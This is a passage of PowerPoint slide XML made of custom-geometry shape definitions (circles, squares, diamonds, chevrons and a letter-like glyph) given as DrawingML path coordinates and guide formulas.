                    <a:gd name="T11" fmla="*/ 31 h 31"/>
                    <a:gd name="T12" fmla="*/ 31 w 62"/>
                    <a:gd name="T13" fmla="*/ 2 h 31"/>
                    <a:gd name="T14" fmla="*/ 2 w 62"/>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31">
                      <a:moveTo>
                        <a:pt x="2" y="31"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="60" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="2"/>
                      </a:ln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26"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9518650" y="4819651"/>
                  <a:ext cx="82550" cy="80963"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 18 w 36"/>
                    <a:gd name="T1" fmla="*/ 35 h 35"/>
                    <a:gd name="T2" fmla="*/ 0 w 36"/>
                    <a:gd name="T3" fmla="*/ 18 h 35"/>
                    <a:gd name="T4" fmla="*/ 18 w 36"/>
                    <a:gd name="T5" fmla="*/ 0 h 35"/>
                    <a:gd name="T6" fmla="*/ 36 w 36"/>
                    <a:gd name="T7" fmla="*/ 18 h 35"/>
                    <a:gd name="T8" fmla="*/ 18 w 36"/>
                    <a:gd name="T9" fmla="*/ 35 h 35"/>
                    <a:gd name="T10" fmla="*/ 18 w 36"/>
                    <a:gd name="T11" fmla="*/ 1 h 35"/>
                    <a:gd name="T12" fmla="*/ 1 w 36"/>
                    <a:gd name="T13" fmla="*/ 18 h 35"/>
                    <a:gd name="T14" fmla="*/ 18 w 36"/>
                    <a:gd name="T15" fmla="*/ 34 h 35"/>
                    <a:gd name="T16" fmla="*/ 35 w 36"/>
                    <a:gd name="T17" fmla="*/ 18 h 35"/>
                    <a:gd name="T18" fmla="*/ 18 w 36"/>
                    <a:gd name="T19"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5">
                      <a:moveTo>
                        <a:pt x="18" y="35"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="35"/>
                        <a:pt x="0" y="27"/>
                        <a:pt x="0" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="8"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="18" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="0"/>
                        <a:pt x="36" y="8"/>
                        <a:pt x="36" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="27"/>
                        <a:pt x="28" y="35"/>
                        <a:pt x="18" y="35"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="18" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="1"/>
                        <a:pt x="1" y="8"/>
                        <a:pt x="1" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="27"/>
                        <a:pt x="9" y="34"/>
                        <a:pt x="18" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="34"/>
                        <a:pt x="35" y="27"/>
                        <a:pt x="35" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="8"/>
                        <a:pt x="28" y="1"/>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27"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9525000" y="4826001"/>
                  <a:ext cx="69850" cy="66675"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 30"/>
                    <a:gd name="T1" fmla="*/ 29 h 29"/>
                    <a:gd name="T2" fmla="*/ 0 w 30"/>
                    <a:gd name="T3" fmla="*/ 15 h 29"/>
                    <a:gd name="T4" fmla="*/ 15 w 30"/>
                    <a:gd name="T5" fmla="*/ 0 h 29"/>
                    <a:gd name="T6" fmla="*/ 30 w 30"/>
                    <a:gd name="T7" fmla="*/ 15 h 29"/>
                    <a:gd name="T8" fmla="*/ 15 w 30"/>
                    <a:gd name="T9" fmla="*/ 29 h 29"/>
                    <a:gd name="T10" fmla="*/ 15 w 30"/>
                    <a:gd name="T11" fmla="*/ 0 h 29"/>
                    <a:gd name="T12" fmla="*/ 1 w 30"/>
                    <a:gd name="T13" fmla="*/ 15 h 29"/>
                    <a:gd name="T14" fmla="*/ 15 w 30"/>
                    <a:gd name="T15" fmla="*/ 29 h 29"/>
                    <a:gd name="T16" fmla="*/ 29 w 30"/>
                    <a:gd name="T17" fmla="*/ 15 h 29"/>
                    <a:gd name="T18" fmla="*/ 15 w 30"/>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9">
                      <a:moveTo>
                        <a:pt x="15" y="29"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="29"/>
                        <a:pt x="0" y="23"/>
                        <a:pt x="0" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="15" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="0"/>
                        <a:pt x="30" y="6"/>
                        <a:pt x="30" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="23"/>
                        <a:pt x="23" y="29"/>
                        <a:pt x="15" y="29"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="15" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="22"/>
                        <a:pt x="7" y="29"/>
                        <a:pt x="15" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="29"/>
                        <a:pt x="29" y="22"/>
                        <a:pt x="29" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="7"/>
                        <a:pt x="23"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28"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9620250" y="4810126"/>
                  <a:ext cx="93663" cy="98425"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 59 w 59"/>
                    <a:gd name="T1" fmla="*/ 62 h 62"/>
                    <a:gd name="T2" fmla="*/ 0 w 59"/>
                    <a:gd name="T3" fmla="*/ 62 h 62"/>
                    <a:gd name="T4" fmla="*/ 0 w 59"/>
                    <a:gd name="T5" fmla="*/ 0 h 62"/>
                    <a:gd name="T6" fmla="*/ 59 w 59"/>
                    <a:gd name="T7" fmla="*/ 0 h 62"/>
                    <a:gd name="T8" fmla="*/ 59 w 59"/>
                    <a:gd name="T9" fmla="*/ 62 h 62"/>
                    <a:gd name="T10" fmla="*/ 1 w 59"/>
                    <a:gd name="T11" fmla="*/ 61 h 62"/>
                    <a:gd name="T12" fmla="*/ 58 w 59"/>
                    <a:gd name="T13" fmla="*/ 61 h 62"/>
                    <a:gd name="T14" fmla="*/ 58 w 59"/>
                    <a:gd name="T15" fmla="*/ 1 h 62"/>
                    <a:gd name="T16" fmla="*/ 1 w 59"/>
                    <a:gd name="T17" fmla="*/ 1 h 62"/>
                    <a:gd name="T18" fmla="*/ 1 w 59"/>
                    <a:gd name="T19" fmla="*/ 6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2">
                      <a:moveTo>
                        <a:pt x="59" y="62"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="59" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="59" y="62"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1" y="61"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="58" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="1"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="1"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1"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29"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9625013" y="4819651"/>
                  <a:ext cx="82550" cy="80963"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 18 w 36"/>
                    <a:gd name="T1" fmla="*/ 35 h 35"/>
                    <a:gd name="T2" fmla="*/ 0 w 36"/>
                    <a:gd name="T3" fmla="*/ 18 h 35"/>
                    <a:gd name="T4" fmla="*/ 18 w 36"/>
                    <a:gd name="T5" fmla="*/ 0 h 35"/>
                    <a:gd name="T6" fmla="*/ 36 w 36"/>
                    <a:gd name="T7" fmla="*/ 18 h 35"/>
                    <a:gd name="T8" fmla="*/ 18 w 36"/>
                    <a:gd name="T9" fmla="*/ 35 h 35"/>
                    <a:gd name="T10" fmla="*/ 18 w 36"/>
                    <a:gd name="T11" fmla="*/ 1 h 35"/>
                    <a:gd name="T12" fmla="*/ 1 w 36"/>
                    <a:gd name="T13" fmla="*/ 18 h 35"/>
                    <a:gd name="T14" fmla="*/ 18 w 36"/>
                    <a:gd name="T15" fmla="*/ 34 h 35"/>
                    <a:gd name="T16" fmla="*/ 35 w 36"/>
                    <a:gd name="T17" fmla="*/ 18 h 35"/>
                    <a:gd name="T18" fmla="*/ 18 w 36"/>
                    <a:gd name="T19"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5">
                      <a:moveTo>
                        <a:pt x="18" y="35"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="35"/>
                        <a:pt x="0" y="27"/>
                        <a:pt x="0" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="8"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="18" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="0"/>
                        <a:pt x="36" y="8"/>
                        <a:pt x="36" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="27"/>
                        <a:pt x="28" y="35"/>
                        <a:pt x="18" y="35"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="18" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="1"/>
                        <a:pt x="1" y="8"/>
                        <a:pt x="1" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="27"/>
                        <a:pt x="9" y="34"/>
                        <a:pt x="18" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="34"/>
                        <a:pt x="35" y="27"/>
                        <a:pt x="35" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="8"/>
                        <a:pt x="28" y="1"/>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30"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9631363" y="4826001"/>
                  <a:ext cx="69850" cy="66675"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 30"/>
                    <a:gd name="T1" fmla="*/ 29 h 29"/>
                    <a:gd name="T2" fmla="*/ 0 w 30"/>
                    <a:gd name="T3" fmla="*/ 15 h 29"/>
                    <a:gd name="T4" fmla="*/ 15 w 30"/>
                    <a:gd name="T5" fmla="*/ 0 h 29"/>
                    <a:gd name="T6" fmla="*/ 30 w 30"/>
                    <a:gd name="T7" fmla="*/ 15 h 29"/>
                    <a:gd name="T8" fmla="*/ 15 w 30"/>
                    <a:gd name="T9" fmla="*/ 29 h 29"/>
                    <a:gd name="T10" fmla="*/ 15 w 30"/>
                    <a:gd name="T11" fmla="*/ 0 h 29"/>
                    <a:gd name="T12" fmla="*/ 1 w 30"/>
                    <a:gd name="T13" fmla="*/ 15 h 29"/>
                    <a:gd name="T14" fmla="*/ 15 w 30"/>
                    <a:gd name="T15" fmla="*/ 29 h 29"/>
                    <a:gd name="T16" fmla="*/ 29 w 30"/>
                    <a:gd name="T17" fmla="*/ 15 h 29"/>
                    <a:gd name="T18" fmla="*/ 15 w 30"/>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9">
                      <a:moveTo>
                        <a:pt x="15" y="29"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="29"/>
                        <a:pt x="0" y="23"/>
                        <a:pt x="0" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="15" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="0"/>
                        <a:pt x="30" y="6"/>
                        <a:pt x="30" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="23"/>
                        <a:pt x="23" y="29"/>
                        <a:pt x="15" y="29"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="15" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="22"/>
                        <a:pt x="7" y="29"/>
                        <a:pt x="15" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="29"/>
                        <a:pt x="29" y="22"/>
                        <a:pt x="29" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="7"/>
                        <a:pt x="23"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31"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9620250" y="4811713"/>
                  <a:ext cx="47625" cy="95250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 30"/>
                    <a:gd name="T1" fmla="*/ 60 h 60"/>
                    <a:gd name="T2" fmla="*/ 0 w 30"/>
                    <a:gd name="T3" fmla="*/ 60 h 60"/>
                    <a:gd name="T4" fmla="*/ 29 w 30"/>
                    <a:gd name="T5" fmla="*/ 31 h 60"/>
                    <a:gd name="T6" fmla="*/ 0 w 30"/>
                    <a:gd name="T7" fmla="*/ 0 h 60"/>
                    <a:gd name="T8" fmla="*/ 1 w 30"/>
                    <a:gd name="T9" fmla="*/ 0 h 60"/>
                    <a:gd name="T10" fmla="*/ 30 w 30"/>
                    <a:gd name="T11" fmla="*/ 31 h 60"/>
                    <a:gd name="T12" fmla="*/ 1 w 30"/>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30" h="60">
                      <a:moveTo>
                        <a:pt x="1" y="60"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="60"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1"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32"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9453563" y="4699001"/>
                  <a:ext cx="46038" cy="46038"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 29"/>
                    <a:gd name="T1" fmla="*/ 29 h 29"/>
                    <a:gd name="T2" fmla="*/ 0 w 29"/>
                    <a:gd name="T3" fmla="*/ 29 h 29"/>
                    <a:gd name="T4" fmla="*/ 29 w 29"/>
                    <a:gd name="T5" fmla="*/ 0 h 29"/>
                    <a:gd name="T6" fmla="*/ 29 w 29"/>
                    <a:gd name="T7" fmla="*/ 1 h 29"/>
                    <a:gd name="T8" fmla="*/ 0 w 29"/>
                    <a:gd name="T9" fmla="*/ 29 h 29"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="29" h="29">
                      <a:moveTo>
                        <a:pt x="0" y="29"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="1"/>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33"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539288" y="4840288"/>
                  <a:ext cx="41275" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 26"/>
                    <a:gd name="T1" fmla="*/ 24 h 24"/>
                    <a:gd name="T2" fmla="*/ 0 w 26"/>
                    <a:gd name="T3" fmla="*/ 13 h 24"/>
                    <a:gd name="T4" fmla="*/ 13 w 26"/>
                    <a:gd name="T5" fmla="*/ 0 h 24"/>
                    <a:gd name="T6" fmla="*/ 26 w 26"/>
                    <a:gd name="T7" fmla="*/ 13 h 24"/>
                    <a:gd name="T8" fmla="*/ 13 w 26"/>
                    <a:gd name="T9" fmla="*/ 24 h 24"/>
                    <a:gd name="T10" fmla="*/ 3 w 26"/>
                    <a:gd name="T11" fmla="*/ 13 h 24"/>
                    <a:gd name="T12" fmla="*/ 13 w 26"/>
                    <a:gd name="T13" fmla="*/ 23 h 24"/>
                    <a:gd name="T14" fmla="*/ 25 w 26"/>
                    <a:gd name="T15" fmla="*/ 13 h 24"/>
                    <a:gd name="T16" fmla="*/ 13 w 26"/>
                    <a:gd name="T17" fmla="*/ 1 h 24"/>
                    <a:gd name="T18" fmla="*/ 3 w 26"/>
                    <a:gd name="T19" fmla="*/ 1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13" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="24"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="3" y="13"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="13" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="1"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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34"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9536113" y="4835526"/>
                  <a:ext cx="49213" cy="47625"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 31 w 31"/>
                    <a:gd name="T1" fmla="*/ 30 h 30"/>
                    <a:gd name="T2" fmla="*/ 0 w 31"/>
                    <a:gd name="T3" fmla="*/ 30 h 30"/>
                    <a:gd name="T4" fmla="*/ 0 w 31"/>
                    <a:gd name="T5" fmla="*/ 0 h 30"/>
                    <a:gd name="T6" fmla="*/ 31 w 31"/>
                    <a:gd name="T7" fmla="*/ 0 h 30"/>
                    <a:gd name="T8" fmla="*/ 31 w 31"/>
                    <a:gd name="T9" fmla="*/ 30 h 30"/>
                    <a:gd name="T10" fmla="*/ 0 w 31"/>
                    <a:gd name="T11" fmla="*/ 29 h 30"/>
                    <a:gd name="T12" fmla="*/ 29 w 31"/>
                    <a:gd name="T13" fmla="*/ 29 h 30"/>
                    <a:gd name="T14" fmla="*/ 29 w 31"/>
                    <a:gd name="T15" fmla="*/ 1 h 30"/>
                    <a:gd name="T16" fmla="*/ 0 w 31"/>
                    <a:gd name="T17" fmla="*/ 1 h 30"/>
                    <a:gd name="T18" fmla="*/ 0 w 31"/>
                    <a:gd name="T19"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0">
                      <a:moveTo>
                        <a:pt x="31" y="30"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="30"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="0" y="29"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="29" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="1"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1"/>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35"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9347200" y="4806951"/>
                  <a:ext cx="39688" cy="90488"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 23 w 25"/>
                    <a:gd name="T1" fmla="*/ 57 h 57"/>
                    <a:gd name="T2" fmla="*/ 0 w 25"/>
                    <a:gd name="T3" fmla="*/ 34 h 57"/>
                    <a:gd name="T4" fmla="*/ 0 w 25"/>
                    <a:gd name="T5" fmla="*/ 0 h 57"/>
                    <a:gd name="T6" fmla="*/ 2 w 25"/>
                    <a:gd name="T7" fmla="*/ 0 h 57"/>
                    <a:gd name="T8" fmla="*/ 2 w 25"/>
                    <a:gd name="T9" fmla="*/ 32 h 57"/>
                    <a:gd name="T10" fmla="*/ 25 w 25"/>
                    <a:gd name="T11" fmla="*/ 57 h 57"/>
                    <a:gd name="T12" fmla="*/ 23 w 25"/>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25" h="57">
                      <a:moveTo>
                        <a:pt x="23" y="57"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23"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36"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9301163" y="4627563"/>
                  <a:ext cx="20638" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9"/>
                    <a:gd name="T1" fmla="*/ 13 h 17"/>
                    <a:gd name="T2" fmla="*/ 1 w 9"/>
                    <a:gd name="T3" fmla="*/ 13 h 17"/>
                    <a:gd name="T4" fmla="*/ 5 w 9"/>
                    <a:gd name="T5" fmla="*/ 15 h 17"/>
                    <a:gd name="T6" fmla="*/ 6 w 9"/>
                    <a:gd name="T7" fmla="*/ 15 h 17"/>
                    <a:gd name="T8" fmla="*/ 7 w 9"/>
                    <a:gd name="T9" fmla="*/ 14 h 17"/>
                    <a:gd name="T10" fmla="*/ 8 w 9"/>
                    <a:gd name="T11" fmla="*/ 12 h 17"/>
                    <a:gd name="T12" fmla="*/ 7 w 9"/>
                    <a:gd name="T13" fmla="*/ 11 h 17"/>
                    <a:gd name="T14" fmla="*/ 4 w 9"/>
                    <a:gd name="T15" fmla="*/ 8 h 17"/>
                    <a:gd name="T16" fmla="*/ 2 w 9"/>
                    <a:gd name="T17" fmla="*/ 6 h 17"/>
                    <a:gd name="T18" fmla="*/ 1 w 9"/>
                    <a:gd name="T19" fmla="*/ 4 h 17"/>
                    <a:gd name="T20" fmla="*/ 1 w 9"/>
                    <a:gd name="T21" fmla="*/ 2 h 17"/>
                    <a:gd name="T22" fmla="*/ 3 w 9"/>
                    <a:gd name="T23" fmla="*/ 0 h 17"/>
                    <a:gd name="T24" fmla="*/ 5 w 9"/>
                    <a:gd name="T25" fmla="*/ 0 h 17"/>
                    <a:gd name="T26" fmla="*/ 7 w 9"/>
                    <a:gd name="T27" fmla="*/ 0 h 17"/>
                    <a:gd name="T28" fmla="*/ 9 w 9"/>
                    <a:gd name="T29" fmla="*/ 3 h 17"/>
                    <a:gd name="T30" fmla="*/ 8 w 9"/>
                    <a:gd name="T31" fmla="*/ 4 h 17"/>
                    <a:gd name="T32" fmla="*/ 6 w 9"/>
                    <a:gd name="T33" fmla="*/ 2 h 17"/>
                    <a:gd name="T34" fmla="*/ 5 w 9"/>
                    <a:gd name="T35" fmla="*/ 2 h 17"/>
                    <a:gd name="T36" fmla="*/ 3 w 9"/>
                    <a:gd name="T37" fmla="*/ 2 h 17"/>
                    <a:gd name="T38" fmla="*/ 3 w 9"/>
                    <a:gd name="T39" fmla="*/ 4 h 17"/>
                    <a:gd name="T40" fmla="*/ 3 w 9"/>
                    <a:gd name="T41" fmla="*/ 5 h 17"/>
                    <a:gd name="T42" fmla="*/ 4 w 9"/>
                    <a:gd name="T43" fmla="*/ 6 h 17"/>
                    <a:gd name="T44" fmla="*/ 6 w 9"/>
                    <a:gd name="T45" fmla="*/ 7 h 17"/>
                    <a:gd name="T46" fmla="*/ 8 w 9"/>
                    <a:gd name="T47" fmla="*/ 10 h 17"/>
                    <a:gd name="T48" fmla="*/ 9 w 9"/>
                    <a:gd name="T49" fmla="*/ 12 h 17"/>
                    <a:gd name="T50" fmla="*/ 8 w 9"/>
                    <a:gd name="T51" fmla="*/ 15 h 17"/>
                    <a:gd name="T52" fmla="*/ 5 w 9"/>
                    <a:gd name="T53" fmla="*/ 17 h 17"/>
                    <a:gd name="T54" fmla="*/ 2 w 9"/>
                    <a:gd name="T55" fmla="*/ 16 h 17"/>
                    <a:gd name="T56" fmla="*/ 0 w 9"/>
                    <a:gd name="T57"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 h="17">
                      <a:moveTo>
                        <a:pt x="0" y="13"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="14"/>
                        <a:pt x="3" y="15"/>
                        <a:pt x="5" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="6" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="15"/>
                        <a:pt x="7" y="14"/>
                        <a:pt x="7" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="13"/>
                        <a:pt x="8" y="13"/>
                        <a:pt x="8" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="7" y="11"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="7"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="5"/>
                        <a:pt x="1" y="5"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="2"/>
                        <a:pt x="1" y="2"/>
                      </a:cubicBezTo>
